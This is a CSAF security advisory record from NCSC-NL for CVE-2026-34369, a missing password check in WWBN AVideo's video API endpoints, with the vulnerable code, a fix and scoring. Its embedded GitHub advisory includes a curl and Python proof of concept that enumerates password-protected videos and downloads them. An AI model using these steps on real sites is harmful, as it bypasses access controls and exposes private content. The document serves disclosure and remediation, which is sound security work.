{ "document": { "category": "csaf_base", "csaf_version": "2.0", "distribution": { "tlp": { "label": "WHITE" } }, "lang": "en", "notes": [ { "category": "legal_disclaimer", "text": "The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this portal to enhance access to its information and vulnerabilities. The use of this information is subject to the following terms and conditions:\n\nThe vulnerabilities disclosed in this portal are gathered by NCSC-NL from a variety of open sources, which the user can retrieve from other platforms. NCSC-NL makes every reasonable effort to ensure that the content of this portal is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or real-time keeping up-to-date. NCSC-NL does not control nor guarantee the accuracy, relevance, timeliness or completeness of information obtained from these external sources. The vulnerabilities disclosed in this portal are intended solely for the convenience of professional parties to take appropriate measures to manage the risks posed to the cybersecurity. No rights can be derived from the information provided therein.\n\nNCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or inability of use of the vulnerabilities disclosed in this portal. This includes damage resulting from the inaccuracy of incompleteness of the information contained in it.\nThe information on this page is subject to Dutch law. All disputes related to or arising from the use of this portal regarding the disclosure of vulnerabilities will be submitted to the competent court in The Hague. This choice of means also applies to the court in summary proceedings." } ], "publisher": { "category": "coordinator", "contact_details": "cert@ncsc.nl", "name": "National Cyber Security Centre", "namespace": "https://www.ncsc.nl/" }, "title": "CVE-2026-34369", "tracking": { "current_release_date": "2026-03-31T19:28:40.534126Z", "generator": { "date": "2026-02-17T15:00:00Z", "engine": { "name": "V.E.L.M.A", "version": "1.7" } }, "id": "CVE-2026-34369", "initial_release_date": "2026-03-27T19:48:30.890797Z", "revision_history": [ { "date": "2026-03-27T19:48:30.890797Z", "number": "1", "summary": "CVE created.| Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (1).| References created (2).| CWES updated (1)." }, { "date": "2026-03-27T19:48:33.089082Z", "number": "2", "summary": "NCSC Score created." }, { "date": "2026-03-27T21:12:38.814207Z", "number": "3", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (2).| CWES updated (1)." }, { "date": "2026-03-27T21:12:49.941218Z", "number": "4", "summary": "NCSC Score updated." }, { "date": "2026-03-29T00:38:16.414328Z", "number": "5", "summary": "Source connected.| CVE status created. (valid)| EPSS created." }, { "date": "2026-03-29T00:38:25.019800Z", "number": "6", "summary": "NCSC Score updated." }, { "date": "2026-03-30T19:15:11.148245Z", "number": "7", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (4).| CWES updated (1)." }, { "date": "2026-03-30T19:15:32.683375Z", "number": "8", "summary": "NCSC Score updated." }, { "date": "2026-03-30T19:39:14.009974Z", "number": "9", "summary": "Unknown change." }, { "date": "2026-03-31T19:27:45.984662Z", "number": "10", "summary": "Products connected (1).| Product Identifiers created (1).| Exploits created (1)." }, { "date": "2026-03-31T19:27:47.607457Z", "number": "11", "summary": "NCSC Score updated." } ], "status": "interim", "version": "11" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:unknown/<=26.0", "product": { "name": "vers:unknown/<=26.0", "product_id": "CSAFPID-5893889", "product_identification_helper": { "cpe": "cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:*" } } } ], "category": "product_name", "name": "AVideo" } ], "category": "vendor", "name": "WWBN" } ] }, "vulnerabilities": [ { "cve": "CVE-2026-34369", "cwe": { "id": "CWE-862", "name": "Missing Authorization" }, "notes": [ { "category": "description", "text": "WWBN AVideo is an open source video platform. In versions up to and including 26.0, the `get_api_video_file` and `get_api_video` API endpoints in AVideo return full video playback sources (direct MP4 URLs, HLS manifests) for password-protected videos without verifying the video password. While the normal web playback flow enforces password checks via the `CustomizeUser::getModeYouTube()` hook, this enforcement is completely absent from the API code path. An unauthenticated attacker can retrieve direct playback URLs for any password-protected video by calling the API directly. Commit be344206f2f461c034ad2f1c5d8212dd8a52b8c7 fixes the issue.", "title": "cveprojectv5 - https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/34xxx/CVE-2026-34369.json" }, { "category": "description", "text": "WWBN AVideo is an open source video platform. In versions up to and including 26.0, the `get_api_video_file` and `get_api_video` API endpoints in AVideo return full video playback sources (direct MP4 URLs, HLS manifests) for password-protected videos without verifying the video password. While the normal web playback flow enforces password checks via the `CustomizeUser::getModeYouTube()` hook, this enforcement is completely absent from the API code path. An unauthenticated attacker can retrieve direct playback URLs for any password-protected video by calling the API directly. Commit be344206f2f461c034ad2f1c5d8212dd8a52b8c7 fixes the issue.", "title": "nvd - https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-34369" }, { "category": "description", "text": "## Summary\n\nThe `get_api_video_file` and `get_api_video` API endpoints in AVideo return full video playback sources (direct MP4 URLs, HLS manifests) for password-protected videos without verifying the video password. While the normal web playback flow enforces password checks via the `CustomizeUser::getModeYouTube()` hook, this enforcement is completely absent from the API code path. An unauthenticated attacker can retrieve direct playback URLs for any password-protected video by calling the API directly.\n\n## Details\n\nThe video password protection is enforced in the web UI via `CustomizeUser::getModeYouTube()` (`plugin/CustomizeUser/CustomizeUser.php:787`), which calls `videoPasswordIsGood()` before rendering the video player. However, this hook is only invoked during web page rendering — the API endpoints bypass it entirely.\n\n**Vulnerable endpoint 1 — `get_api_video_file` (`plugin/API/API.php:986-1004`):**\n\n```php\npublic function get_api_video_file($parameters)\n{\n global $global;\n $obj = $this->startResponseObject($parameters);\n $obj->videos_id = $parameters['videos_id'];\n if (!self::isAPISecretValid()) {\n if (!User::canWatchVideoWithAds($obj->videos_id)) {\n return new ApiObject(\"You cannot watch this video\");\n }\n }\n $video = new Video('', '', $obj->videos_id);\n $obj->filename = $video->getFilename();\n // ...\n $obj->video_file = Video::getHigherVideoPathFromID($obj->videos_id);\n $obj->sources = getSources($obj->filename, true);\n return new ApiObject(\"\", false, $obj);\n}\n```\n\nThe only access check is `User::canWatchVideoWithAds()` (`objects/user.php:1102-1159`), which checks admin status, video active status, owner status, and plugin-level restrictions (subscription/PPV). It does **not** check `video_password`. Password-protected videos have status `'a'` (active), which passes all checks.\n\n**Vulnerable endpoint 2 — `get_api_video` (`plugin/API/API.php:1635-1810`):**\n\nThis endpoint returns video metadata including full `videos` paths (line 1759) and `sources` arrays (line 1785) for all videos in query results, with no password verification anywhere in the function.\n\n**The intended password check exists but is never called from these endpoints:**\n\n`Video::verifyVideoPassword()` (`objects/video.php:543-553`) is the proper password verification function, and `get_api_video_password_is_correct` exists as a separate API endpoint — proving password verification was intended as an access control. But neither `get_api_video_file` nor `get_api_video` invoke any password check.\n\n## PoC\n\n```bash\n# Step 1: Identify a password-protected video via the video list API\ncurl -s 'https://target.com/plugin/API/get.json.php?APIName=video&rowCount=50' | \\\n python3 -c \"\nimport json, sys\ndata = json.load(sys.stdin)\nfor v in data.get('response',{}).get('rows',[]):\n if v.get('video_password'):\n print(f'ID: {v[\\\"id\\\"]}, Title: {v[\\\"title\\\"]}, Password Protected: YES')\n print(f' Direct sources: {json.dumps(v.get(\\\"sources\\\",[])[0] if v.get(\\\"sources\\\") else \\\"none\\\")}')\"\n\n# Step 2: Retrieve full playback sources for the password-protected video\ncurl -s 'https://target.com/plugin/API/get.json.php?APIName=video_file&videos_id='\n\n# Expected: access denied or password prompt\n# Actual: full response with direct MP4/HLS URLs:\n# {\"error\":false,\"response\":{\"videos_id\":\"123\",\"filename\":\"video_abc\",\n# \"video_file\":\"https://target.com/videos/video_abc/video_abc_HD.mp4\",\n# \"sources\":[{\"src\":\"https://target.com/videos/video_abc/video_abc_HD.mp4\",\"type\":\"video/mp4\"}]}}\n\n# Step 3: Download the protected video directly\ncurl -O 'https://target.com/videos/video_abc/video_abc_HD.mp4'\n```\n\n## Impact\n\nAny unauthenticated user can retrieve direct playable video URLs for all password-protected videos, completely bypassing the password requirement. The `get_api_video` endpoint additionally exposes which videos are password-protected (via the `video_password` field set to `'1'`), allowing targeted enumeration. This renders the `video_password` feature ineffective for any content accessible through the API, which includes mobile apps, third-party integrations, and direct API consumers.\n\n## Recommended Fix\n\nAdd password verification to both API endpoints before returning video sources. In `plugin/API/API.php`:\n\n```php\npublic function get_api_video_file($parameters)\n{\n global $global;\n $obj = $this->startResponseObject($parameters);\n $obj->videos_id = $parameters['videos_id'];\n if (!self::isAPISecretValid()) {\n if (!User::canWatchVideoWithAds($obj->videos_id)) {\n return new ApiObject(\"You cannot watch this video\");\n }\n // Check video password protection\n $video = new Video('', '', $obj->videos_id);\n $storedPassword = $video->getVideo_password();\n if (!empty($storedPassword)) {\n $providedPassword = @$parameters['video_password'];\n if (empty($providedPassword) || !Video::verifyVideoPassword($providedPassword, $storedPassword)) {\n return new ApiObject(\"Video password required\", true);\n }\n }\n }\n // ... rest of function\n}\n```\n\nApply the same check in `get_api_video()` before populating the `videos` and `sources` fields (around line 1759), replacing source data with an empty object when the password is not provided or incorrect. Also fix `get_api_video_password_is_correct` to use `Video::verifyVideoPassword()` instead of direct `==` comparison (line 1126), which currently fails for bcrypt hashes.", "title": "github - https://api.github.com/advisories/GHSA-q6jj-r49p-94fh" }, { "category": "other", "text": "0.00031", "title": "EPSS" }, { "category": "other", "text": "3.9", "title": "NCSC Score" }, { "category": "other", "text": "There is exploit data available from source Nvd, Is related to (a version of) an uncommon product, The value of the most recent EPSS score", "title": "NCSC Score top decreasing factors" } ], "product_status": { "known_affected": [ "CSAFPID-5893889" ] }, "references": [ { "category": "external", "summary": "Source - cveprojectv5", "url": "https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/34xxx/CVE-2026-34369.json" }, { "category": "external", "summary": "Source - nvd", "url": "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-34369" }, { "category": "external", "summary": "Source - first", "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0" }, { "category": "external", "summary": "Source - github", "url": "https://api.github.com/advisories/GHSA-q6jj-r49p-94fh" }, { "category": "external", "summary": "Reference - cveprojectv5; github; nvd", "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-q6jj-r49p-94fh" }, { "category": "external", "summary": "Reference - cveprojectv5; github; nvd", "url": "https://github.com/WWBN/AVideo/commit/be344206f2f461c034ad2f1c5d8212dd8a52b8c7" }, { "category": "external", "summary": "Reference - github", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34369" }, { "category": "external", "summary": "Reference - github", "url": "https://github.com/advisories/GHSA-q6jj-r49p-94fh" } ], "scores": [ { "cvss_v3": { "version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM" }, "products": [ "CSAFPID-5893889" ] } ], "title": "CVE-2026-34369" } ] }